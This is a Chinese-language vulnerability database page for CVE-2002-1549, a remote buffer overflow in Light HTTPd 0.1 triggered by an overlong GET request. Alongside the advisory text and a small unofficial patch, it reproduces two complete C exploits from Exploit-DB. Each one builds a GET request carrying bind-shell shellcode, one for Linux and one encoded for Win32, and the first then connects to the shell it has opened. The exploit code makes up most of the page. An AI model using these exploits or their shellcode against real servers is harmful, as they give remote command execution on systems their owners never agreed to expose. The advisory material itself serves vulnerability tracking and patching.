CVE-2002-1549
CVSS7.5
发布时间 :2003-03-31 00:00:00
修订时间 :2008-09-05 16:30:53
NMCOES    

[原文]Buffer overflow in Light HTTPd (lhttpd) 0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]Light HTTPD超长GET请求远程缓冲区溢出漏洞(CNNVD-200303-118)

        
        Lhttpd是一款ghttpd程序增强版。
        Lhttpd对超长GET请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,以WEB进程的权限在系统上执行任意指令。
        攻击者向Lhttpd服务程序提交超长的GET请求,可导致触发缓冲区溢出,精心构建提交数据可能以WEB进程的权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1549
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1549
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-118
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6162
(VENDOR_ADVISORY)  BID  6162
http://www.iss.net/security_center/static/10607.php
(VENDOR_ADVISORY)  XF  light-httpd-bo(10607)
http://archives.neohapsis.com/archives/bugtraq/2002-11/0138.html
(VENDOR_ADVISORY)  BUGTRAQ  20021112 Remote Buffer Overflow vulnerability in Light HTTPd

- 漏洞信息

Light HTTPD超长GET请求远程缓冲区溢出漏洞
高危 边界条件错误
2003-03-31 00:00:00 2005-05-13 00:00:00
远程  
        
        Lhttpd是一款ghttpd程序增强版。
        Lhttpd对超长GET请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,以WEB进程的权限在系统上执行任意指令。
        攻击者向Lhttpd服务程序提交超长的GET请求,可导致触发缓冲区溢出,精心构建提交数据可能以WEB进程的权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        Dong-h0un_u提供如下第三方补丁:
        === util.patch ===
        --- util.c Mon Dec 24 09:43:29 2001
        +++ util.c.patch Thu Oct 17 19:02:00 2002
        @@ -220,7 +220,7 @@
         va_list ap;
         va_start(ap, format); // format it all into temp
        - vsprintf(temp, format, ap);
        + vsnprintf(temp, strlen(temp), format, ap);
         va_end(ap);
         time (&t);
        === eof ===
        厂商补丁:
        LHTTPd
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://lhttpd.sourceforge.net/

- 漏洞信息 (22012)

Light HTTPD 0.1 GET Request Buffer Overflow Vulnerability (1) (EDBID:22012)
linux remote
2002-11-12 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/6162/info

Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. 

/*
**
** Proof of Concept LIGHT HTTPd Remote exploit
**                                by Xpl017Elz
** __
** Testing exploit:
**
** bash$ ./0x82-Remote.lhttpdxpl -h 61.37.xx.xx -t 3
**
**  Proof of Concept LIGHT HTTPd Remote exploit
**                                 by Xpl017Elz
**
**  Try `./0x82-Remote.lhttpdxpl -?' for more information.
**
**  [1] Make shellcode.
**  [2] Send exploit (bindshell) code.
**  [3] Waiting, executes the shell !
**  [4] Trying 61.37.xx.xx:36864 ...
**  [5] Connected to 61.37.xx.xx:36864 !
**
**  [*] It's shell ! :-)
**
** Linux testsub 2.4.2-3 #1 Sun Jun 24 01:31:37 KST 2001 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net
**
** Special Greets: INetCop team.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>

#define HOST "localhost"
#define PORT 3000

struct os
{
    int num;
    char *os;
    int offset;
    unsigned long shaddr;
    int atlen;
};

struct os plat[] =
{
    /* olny test */
    {0,"RedHat Linux 6.x localhost lhttpd",1,0xbfffb744,160},
    {1,"RedHat Linux 6.x remote lhttpd",0,0xbfffb608,150},
    {2,"RedHat Linux 7.x localhost lhttpd",3,0xbfffb650,150},
    {3,"RedHat Linux 7.x remote lhttpd",2,0xbfffb650,160},
    {4,NULL,0,0}
};

int setsock(char *hostname,int port);
void getshell(int sock);
void usage(char *args);
void banrl(char *args);
int main(int argc,char *argv[])
{
    int sockfd1;
    int sockfd2;
    int ax82,bx82,cx82,dx82;
    int type=0;
    int port=PORT;
    int atlen=plat[type].atlen;
    int off=plat[type].offset;
    char offbuf[10];
    char hostname[0x82]=HOST;

    char ptbind[] = /* BIND SHELL ON PORT TCP/36864 */
        //------------------- main: -------------------//
        "\xeb\x72"                        /* jmp callz */
        //------------------- start: ------------------//
        "\x5e"                            /* popl %esi */
        //------------------ socket() -----------------//
        "\x29\xc0"                  /* subl %eax, %eax */
        "\x89\x46\x10"        /* movl %eax, 0x10(%esi) */
        "\x40"                            /* incl %eax */
        "\x89\xc3"                  /* movl %eax, %ebx */
        "\x89\x46\x0c"        /* movl %eax, 0x0c(%esi) */
        "\x40"                            /* incl %eax */
        "\x89\x46\x08"        /* movl %eax, 0x08(%esi) */
        "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------- bind() ------------------//
        "\x43"                            /* incl %ebx */
        "\xc6\x46\x10\x10"   /* movb $0x10, 0x10(%esi) */
        "\x66\x89\x5e\x14"     /* movw %bx, 0x14(%esi) */
        "\x88\x46\x08"         /* movb %al, 0x08(%esi) */
        "\x29\xc0"                  /* subl %eax, %eax */
        "\x89\xc2"                  /* movl %eax, %edx */
        "\x89\x46\x18"        /* movl %eax, 0x18(%esi) */
        "\xb0\x90"                  /* movb $0x90, %al */
        "\x66\x89\x46\x16"     /* movw %ax, 0x16(%esi) */
        "\x8d\x4e\x14"        /* leal 0x14(%esi), %ecx */
        "\x89\x4e\x0c"        /* movl %ecx, 0x0c(%esi) */
        "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ listen() -----------------//
        "\x89\x5e\x0c"        /* movl %ebx, 0x0c(%esi) */
        "\x43"                            /* incl %ebx */
        "\x43"                            /* incl %ebx */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ accept() -----------------//
        "\x89\x56\x0c"        /* movl %edx, 0x0c(%esi) */
        "\x89\x56\x10"        /* movl %edx, 0x10(%esi) */
        "\xb0\x66"                  /* movb $0x66, %al */
        "\x43"                            /* incl %ebx */
        "\xcd\x80"                        /* int $0x80 */
        //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
        "\x86\xc3"                   /* xchgb %al, %bl */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x29\xc9"                  /* subl %ecx, %ecx */
        "\xcd\x80"                        /* int $0x80 */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x41"                            /* incl %ecx */
        "\xcd\x80"                        /* int $0x80 */
        "\xb0\x3f"                  /* movb $0x3f, %al */
        "\x41"                            /* incl %ecx */
        "\xcd\x80"                        /* int $0x80 */
        //------------------ execve() -----------------//
        "\x88\x56\x07"         /* movb %dl, 0x07(%esi) */
        "\x89\x76\x0c"        /* movl %esi, 0x0c(%esi) */
        "\x87\xf3"                 /* xchgl %esi, %ebx */
        "\x8d\x4b\x0c"        /* leal 0x0c(%ebx), %ecx */
        "\xb0\x0b"                  /* movb $0x0b, %al */
        "\xcd\x80"                        /* int $0x80 */
        //------------------- callz: ------------------//
        "\xe8\x89\xff\xff\xff"           /* call start */
        "/bin/sh"; /* 128byte */

    char atbuf[512];
    char sendnrecv[1024];
    unsigned long shcode=plat[type].shaddr;
    ax82=bx82=cx82=dx82=0;

    memset(offbuf,0x00,10);
    memset(atbuf,0x00,512);
    memset(sendnrecv,0x00,1024);

    (void)banrl(argv[0]);

    while((dx82=getopt(argc,argv,"S:s:O:o:H:h:P:p:T:t:"))!=EOF)
    {
        switch(dx82)
        {
            case 'S':
            case 's':
                shcode=strtoul(optarg,NULL,0);
                break;

            case 'O':
            case 'o':
                off=atoi(optarg);
                break;

            case 'H':
            case 'h':
                strncpy(hostname,optarg,0x82);
                break;

            case 'P':
            case 'p':
                port=atoi(optarg);
                break;

            case 'T':
            case 't':
                type=atoi(optarg);

                if(type<0 || type>3)
                    usage(argv[0]);

                off=plat[type].offset;
                shcode=plat[type].shaddr;
                atlen=plat[type].atlen;
                break;

            case '?':
                usage(argv[0]);
                break;
        }
    }

    while(off)
    {
        off--;
        offbuf[off]='^';
    }

    fprintf(stdout," [1] Make shellcode.\n");
    for(ax82=0;ax82<atlen-strlen(ptbind);ax82++)
        atbuf[ax82] = 0x90;

    for(bx82=0;bx82<strlen(ptbind);bx82++)
        atbuf[ax82++]=ptbind[bx82];

    for(cx82=ax82;cx82<ax82+0x32;cx82+=4)
        *(long *)&atbuf[cx82]=shcode;

    snprintf(sendnrecv,1024,"GET /%s%s HTTP/1.0\r\n\n",offbuf,atbuf);

    fprintf(stdout," [2] Send exploit (bindshell) code.\n");
    sockfd1=setsock(hostname,port);
    send(sockfd1,sendnrecv,strlen(sendnrecv),0);

    fprintf(stdout," [3] Waiting, executes the shell !\n");
    sleep(3);

    fprintf(stdout," [4] Trying %s:36864 ...\n",hostname);
    sockfd2=setsock(hostname,36864);
    fprintf(stdout," [5] Connected to %s:36864 !\n\n",hostname);
    getshell(sockfd2);
}

int setsock(char *hostname,int port)
{
    int sock;
    struct hostent *sxp;
    struct sockaddr_in sxp_addr;

    if((sxp=gethostbyname(hostname))==NULL)
    {
        herror("gethostbyname() error");
        exit(-1);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
        perror("socket() error");
        exit(-1);
    }

    sxp_addr.sin_family=AF_INET;
    sxp_addr.sin_port=htons(port);
    sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
    bzero(&(sxp_addr.sin_zero),8);

    if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
    {
        perror("connect() error");
        exit(-1);
    }

    return(sock);
}

void getshell(int sock)
{
    int died;
    char *command="uname -a;id\n";
    char readbuf[1024];
    fd_set rset;

    memset(readbuf,0x00,1024);

    fprintf(stdout," [*] It's shell ! :-)\n\n");
    send(sock,command,strlen(command),0);

    for(;;)
    {
        FD_ZERO(&rset);
        FD_SET(sock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(sock+1,&rset,NULL,NULL,NULL);

        if(FD_ISSET(sock,&rset))
        {
            died=read(sock,readbuf,1024);
            if(died<=0)
            {
                exit(0);
            }
            readbuf[died]=0;
            printf("%s",readbuf);
        }
        if(FD_ISSET(STDIN_FILENO,&rset))
        {
            died=read(STDIN_FILENO,readbuf,1024);
            if(died>0)
            {
                readbuf[died]=0;
                write(sock,readbuf,died);
            }
        }
    }
    return;
}

void usage(char *args)
{
    int x82;
    fprintf(stderr,"\n Default Usage: %s -[option] [arguments]\n\n",args);
    fprintf(stderr,"\t -h [hostname] - target host\n");
    fprintf(stderr,"\t -p [port]     - port number\n");
    fprintf(stderr,"\t -s [addr]     - &shellcode addr\n");
    fprintf(stderr,"\t -o [offset]   - offset\n");
    fprintf(stderr,"\t -t [type]     - type number\n\n");
    fprintf(stderr," Example: %s -h localhost -p 3000 -t 1\n\n",args);
    fprintf(stdout,"\t * Select target type: \n\n");
    for(x82=0;plat[x82].num<4;x82++)
        fprintf(stdout,"\t %d. %s\n",plat[x82].num,plat[x82].os);
    fprintf(stdout,"\n Happy Exploit !\n\n");
    exit(0);
}

void banrl(char *args)
{
    fprintf(stdout,"\n Proof of Concept LIGHT HTTPd Remote exploit");
    fprintf(stdout,"\n                                by Xpl017Elz\n\n");
    fprintf(stdout," Try `%s -?' for more information.\n\n",args);
}


		

- 漏洞信息 (22013)

Light HTTPD 0.1 GET Request Buffer Overflow Vulnerability (2) (EDBID:22013)
linux remote
2002-11-12 Verified
0 uid0x00
N/A [点击下载]
source: http://www.securityfocus.com/bid/6162/info
 
Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. 

/*
 * lhttpd00r.c by uid0x00(uid0x00@hush.com)
 *LHTTPd 0.1 remote buffer overflow exploit
 *
 *should work on any win32. just change ret[] to point at a valid "JMP ESP" address.
 *
 *compile with gcc lhttpd00r.c -o lhttpd00r
 *(tested on cygwin (win2k sp3), compiled with gcc 2.95.3-4 and on redhat 7.2 with gcc 2.96)
 *
 *binds a shell to a desired port.
 *usage: ./lhttpd00r <victimip> <shellport>
 *connect with netcat: nc -v <victimip> <port>
 *
 *Disclaimer:
 *Use of this information constitutes acceptance for use in an AS IS condition. There are
 *NO warranties with regard to this information. In no event shall the author
 *be liable for any damages whatsoever arising out of or in connection with
 *the use or spread of this information. Any use of this information is at the
 *user's own risk.
 *
 */
#ifdef _WIN32
#include <windows.h>
#include <winsock2.h>
#else
#include <sys/socket.h>
#include <sys/errno.h>
#include <netinet/in.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#define PORT 3000
#define SHELLCODE_SIZE0x00000300// 768
void usage(char *argv[])
{
    printf("usage:\t%s <ip> <port>\n", argv[0]);
    exit(0);
}
int main(int argc, char *argv[])
{
intport=PORT;
ints;
structsockaddr_in SockAdr;
charret[] = "\xA7\x88\xE2\x77"; //JMP ESP in USER32.DLL Vers. 5.0.2195.4314
charsendnrecv[4096];
char buf[2500];
unsigned shortaport, key;
unsigned charshellcode[SHELLCODE_SIZE] =
{
0xEB, 0x03, 0x5E, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x56, 0x8D,
0x76, 0x17, 0x8B, 0xFE, 0x8B, 0xD6, 0xB9, 0x20, 0xFD, 0xFF, 0xFF, 0xF7,
0xD1, 0xB4, 0x63, 0xAC, 0x32, 0xC4, 0xAA, 0xE2, 0xFA, 0x07, 0x04, 0xC2,
0x53, 0x63, 0xE6, 0xA3, 0x1B, 0x6F, 0xE8, 0x13, 0x6F, 0xE8, 0x15, 0x7F,
0xCE, 0xE8, 0x3B, 0x6B, 0x88, 0x6A, 0xE8, 0x23, 0x57, 0xE8, 0xFB, 0xDB,
0x63, 0x63, 0x63, 0x3D, 0x35, 0xEE, 0xDD, 0x95, 0x61, 0x63, 0x63, 0x35,
0xEE, 0x14, 0xDB, 0xEE, 0x35, 0xDE, 0x09, 0x64, 0x3A, 0xCE, 0x9C, 0xB1,
0xC8, 0x81, 0x99, 0xDB, 0x01, 0x04, 0xEE, 0xC7, 0x9C, 0xB1, 0x31, 0x8B,
0x64, 0x63, 0x63, 0x63, 0x14, 0x10, 0x51, 0x3C, 0x50, 0x51, 0x63, 0x9C,
0xB3, 0x39, 0xF0, 0x09, 0x68, 0x3A, 0xCE, 0x9C, 0xB1, 0xC8, 0x81, 0x99,
0x3D, 0xAB, 0x53, 0x61, 0x63, 0x8B, 0x65, 0x63, 0x63, 0x63, 0xE8, 0x07,
0x47, 0x6B, 0x88, 0x15, 0x50, 0xB1, 0x07, 0x9C, 0x51, 0x07, 0xEA, 0x41,
0x35, 0xEE, 0xDE, 0xB3, 0x9E, 0x9C, 0x9C, 0xEE, 0x2C, 0x4F, 0x48, 0xAC,
0xF1, 0x9F, 0x90, 0xC9, 0xF0, 0xEE, 0x24, 0x93, 0xEE, 0x2B, 0x67, 0xEE,
0x1B, 0x77, 0x8B, 0xD3, 0x62, 0x63, 0x63, 0xEE, 0x24, 0x87, 0xEE, 0x2C,
0x8B, 0x8B, 0xC6, 0x62, 0x63, 0x63, 0x80, 0x22, 0xEE, 0xD5, 0x71, 0x60,
0x63, 0x63, 0xEA, 0x14, 0x9F, 0x09, 0x65, 0x09, 0x62, 0x09, 0x61, 0xCE,
0x9C, 0xB3, 0xEA, 0x24, 0x97, 0x23, 0x17, 0x4A, 0x2B, 0x09, 0x62, 0xE8,
0xAF, 0x09, 0x67, 0x32, 0x09, 0x67, 0x0B, 0x9C, 0x9C, 0x63, 0x63, 0x33,
0xCE, 0x9C, 0xB3, 0x3A, 0xE6, 0xA3, 0x16, 0x72, 0x0B, 0x63, 0x61, 0x63,
0x63, 0x34, 0xCE, 0x9C, 0xB3, 0x34, 0xCE, 0x9C, 0xB3, 0xE6, 0xA3, 0x16,
0x65, 0x3D, 0x8A, 0xD1, 0x63, 0x63, 0x63, 0xE8, 0x23, 0x6F, 0xE8, 0x63,
0x34, 0xE8, 0x1C, 0x97, 0x30, 0x30, 0x9C, 0x53, 0x0B, 0x61, 0x63, 0x6E,
0x66, 0xE8, 0xAF, 0x09, 0x73, 0x32, 0x34, 0xCE, 0x9C, 0xB3, 0xE0, 0xA7,
0x73, 0x09, 0x62, 0x34, 0xCE, 0x9C, 0xB3, 0x30, 0x30, 0x34, 0xCE, 0x9C,
0xB3, 0x3C, 0xEA, 0x24, 0x9B, 0x23, 0x17, 0xAA, 0x3D, 0x9C, 0x14, 0x87,
0x9C, 0x57, 0x47, 0x9C, 0x14, 0x93, 0x30, 0x30, 0x0B, 0x62, 0x62, 0x63,
0x63, 0x09, 0x69, 0x3A, 0x30, 0x81, 0x9E, 0x09, 0x27, 0xE8, 0xB7, 0xEF,
0xAA, 0x51, 0xAA, 0x80, 0x72, 0x0B, 0x20, 0x2C, 0x2E, 0x63, 0x0B, 0x22,
0x2D, 0x27, 0x4D, 0x0B, 0x20, 0x2C, 0x2E, 0x2E, 0x88, 0x66, 0x0B, 0x20,
0x2E, 0x27, 0x63, 0xE8, 0xAF, 0xEE, 0x24, 0xB7, 0x33, 0x31, 0x30, 0x30,
0x09, 0x73, 0x09, 0x62, 0x30, 0x30, 0x32, 0x30, 0x9C, 0xF5, 0x95, 0x61,
0x63, 0x63, 0xE0, 0xA7, 0x2B, 0xF2, 0x80, 0x4E, 0x35, 0x30, 0x37, 0x9C,
0x14, 0xB7, 0xEE, 0xD5, 0x99, 0x61, 0x63, 0x63, 0xCE, 0x9C, 0xB3, 0xF2,
0x80, 0x79, 0x3B, 0x05, 0x5E, 0x60, 0x62, 0x16, 0x70, 0x30, 0xE8, 0xAF,
0x30, 0x32, 0x30, 0x30, 0x30, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0x3A,
0xE6, 0xA3, 0x16, 0x60, 0x3D, 0x88, 0x11, 0x80, 0x4E, 0xDB, 0x63, 0x61,
0x63, 0x63, 0x58, 0xAB, 0x15, 0x62, 0xF2, 0x30, 0xE8, 0xB7, 0x30, 0x31,
0x32, 0x34, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0xF2, 0x3B, 0x80, 0x83,
0x3D, 0x30, 0x33, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5, 0x4D, 0x60, 0x63,
0x63, 0x23, 0x17, 0xB2, 0x88, 0xC1, 0x3D, 0x9C, 0x14, 0x9B, 0x09, 0x62,
0xE8, 0xA7, 0x30, 0x09, 0x51, 0xE8, 0xAF, 0x32, 0x30, 0x30, 0x33, 0x30,
0x9C, 0xF5, 0x51, 0x60, 0x63, 0x63, 0x23, 0x17, 0x4B, 0x2B, 0x17, 0x83,
0x30, 0x0B, 0x63, 0x61, 0x63, 0x63, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5,
0x55, 0x60, 0x63, 0x63, 0x23, 0x17, 0x71, 0x2B, 0x30, 0x37, 0x33, 0x34,
0x9C, 0x14, 0x8F, 0x9C, 0xF5, 0x65, 0x60, 0x63, 0x63, 0xE6, 0xA3, 0x16,
0xD8, 0x50, 0xB1, 0x07, 0xEC, 0x61, 0x39, 0xEE, 0xD5, 0x69, 0x60, 0x63,
0x63, 0xE8, 0x7D, 0xE8, 0x1D, 0x53, 0xEE, 0xD6, 0xB7, 0x9E, 0x9C, 0x9C,
0xCE, 0x33, 0xCE, 0x33, 0xCE, 0xCE, 0x09, 0x65, 0x3A, 0xCE, 0x33, 0x81,
0x9F, 0x9C, 0xB4, 0x9C, 0xB4, 0x09, 0x65, 0x3D, 0x9C, 0xB0, 0x2D, 0x16,
0x98, 0xAA, 0x8A, 0xA1, 0x9E, 0x9C, 0x9C, 0x09, 0x62, 0x30, 0x09, 0x6F,
0xE8, 0xB7, 0x30, 0x31, 0x33, 0x32, 0x9C, 0xF5, 0x6D, 0x60, 0x63, 0x63,
0xE0, 0xA7, 0x6F, 0xF2, 0xA0, 0x03, 0xF4, 0xE8, 0x28, 0x5F, 0xE8, 0x2F,
0x7A, 0x1B, 0x60, 0xA8, 0x50, 0x95, 0xEE, 0x77, 0xD0, 0x60, 0x32, 0x43,
0xE8, 0x71, 0x60, 0xB0, 0x50, 0xA3, 0xA2, 0xA3, 0x64, 0x51, 0x61, 0x21,
0xE3, 0x59, 0x63, 0x16, 0x96, 0x25, 0x58, 0xA4, 0x16, 0x87, 0x2D, 0xE8,
0x32, 0x47, 0x60, 0xB0, 0x6C, 0xD4, 0x77, 0x11, 0xE8, 0x22, 0x7F, 0x60,
0xA0, 0xE8, 0x67, 0xF3, 0x60, 0xA0, 0xEA, 0x27, 0x47, 0x7F, 0x02, 0xA0,
0xA4, 0xE9, 0x52, 0x25, 0xE6, 0x20, 0xAA, 0x9E, 0x5D, 0x15, 0xB6, 0xE2,
0x08, 0x82, 0x1C, 0x2B, 0xA0, 0xB2, 0x5C, 0x6C, 0xB6, 0xD3, 0x5D, 0x11,
0x81, 0x9C, 0xB2, 0xCB, 0x09, 0x92, 0x19, 0x9F, 0x50, 0x54, 0xF1, 0xBB,
0xEB, 0xB3, 0x6A, 0xDA, 0xA5, 0x7B, 0x20, 0x97, 0x07, 0x14, 0x39, 0x6F,
0xEB, 0x52, 0x1E, 0xFD, 0x19, 0x18, 0x1A, 0x5F, 0x07, 0x14, 0x1A, 0x6D,
0x09, 0x11, 0xFA, 0x3E, 0x95, 0x12, 0x3A, 0x6D, 0xFF, 0x1E, 0xFE, 0xF0
};
printf("\nLHTTPd 0.1 remote exploit by uid0x00 (uid0x00@hush.com)\n\n");
//check arguments
if(argc != 3)
{
usage(argv);
}
if ( (atoi(argv[2]) > 65535) || (atoi(argv[2]) <= 0) ) usage(argv);
//set port
aport = (short)atoi(argv[2]);
shellcode[276] = (aport) & 0xff;
    shellcode[275] = (aport >> 8) & 0xff;
//xor
key = (char)99;
shellcode[275]^=key;
shellcode[276]^=key;
//set buffer
memset(buf, 0x90, sizeof(buf));
memcpy(buf+260, ret, 4);//return adress
//memset(buf+265, 0xCC, 1);//break point
//there's some kind of garbage on the stack right after the ret so the shellcode starts at 10000
memcpy(buf+1000, shellcode, sizeof(shellcode));
snprintf(sendnrecv, sizeof(sendnrecv), "GET /%s HTTP/1.0\r\n\n", buf);
printf("initialising socket\n");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (s)
{
    printf("...initialized\n");
    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(PORT);
printf("trying to connect\n");
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr)))
{
printf("...connected\n");
      printf("(waiting)\n");
      sleep(3);
printf("sending exploit\n");
      send(s, sendnrecv, strlen(sendnrecv), 0);
printf("...sent\n");
printf("(waiting)\n");
sleep(3);
printf("...closed\nshell bound to port %s \n", argv[2]);
close(s);
    }
    else
    {
printf("... failed :( errno = %i\n", errno);
close(s);
return(0);
    }
}
}
		

- 漏洞信息

14292
Light HTTPd (lhttpd) GET Request Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-11-12 Unknow
2002-11-12 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Light HTTPD GET Request Buffer Overflow Vulnerability
Boundary Condition Error 6162
Yes No
2002-11-12 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability is credited to "dong-h0un U".

- 受影响的程序版本

Light httpd Light httpd 0.1

- 漏洞讨论

Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user.

- 漏洞利用

An exploit has been written by exploit by "you dong-hun"(Xpl017Elz), &lt;szoahc@hotmail.com&gt;.

A second exploit has been released by uid0x00 &lt;uid0x00@hush.com&gt;.

- 解决方案

An unofficial patch has been released by "dong-houn yoU" (Xpl017Elz), of INetCop Security.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Light httpd Light httpd 0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站